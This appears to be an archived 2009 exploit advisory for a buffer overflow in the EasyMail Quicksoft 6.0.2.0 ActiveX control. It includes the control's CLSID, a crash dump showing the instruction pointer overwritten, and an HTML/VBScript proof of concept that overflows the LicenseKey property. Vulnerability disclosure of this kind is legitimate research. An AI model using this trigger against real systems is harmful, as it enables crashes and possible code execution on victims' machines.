EasyMail Quicksoft 6.0.2.0 Code Execution

EasyMail Quicksoft 6.0.2.0 Code Execution: Posted Sep 16, 2009; Authored by Francis Provencher; EasyMail Quicksoft version 6.0.2.0 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | d45ccf0c6529ec57992181bf8ddc446abb5d6c148bd3e767e38401ea98b97b0a; Download | Favorite | View

EasyMail Quicksoft 6.0.2.0 Code Execution

#####################################################################################

Application:  EasyMail Quicksoft 6.0.2.0
            
Platforms:    Windows XP Professional French SP2

crash:        IE 6.0.2900.2180
        
  
Exploitation: remote Code Execution

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
             

#####################################################################################

1) Introduction
2) Technical details and bug
3) The Code

#####################################################################################

===============
1) Introduction
===============

Create, send, download, parse, print and store internet email messages in your classic windows application.  Designed for Visual Basic, ASP, C++, Delphi, ColdFusion, PowerBuilder, Access and other development environments.  COM or standard DLL interfaces.  This is the software that processes hundreds of millions of email messages on the Internet every day.

#####################################################################################

============================
2) Technical details 
============================

Name:  emimap4.dll
Ver.:  6.0.2.0
CLSID:  {0CEA3FB1-7F88-4803-AA8E-AD021566955D}

ModLoad: 037f0000 0381e000   C:\WINDOWS\system32\emimap4.dll
(2088.2388): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0380c878 ecx=0012df70 edx=00000039 esi=0033df18 edi=0033e14c
eip=41414141 esp=0012df88 ebp=41414141 iopl=0         nv up ei pl zr na pe nc





#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;

<HTML>
<object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object>
<script language = 'vbscript'>



  Scrap  =   unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")


  code = Scrap


  target.LicenseKey = code


</script>
<html>
~



#####################################################################################

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

EasyMail Quicksoft 6.0.2.0 Code Execution

EasyMail Quicksoft 6.0.2.0 Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

EasyMail Quicksoft 6.0.2.0 Code Execution

Share This

EasyMail Quicksoft 6.0.2.0 Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems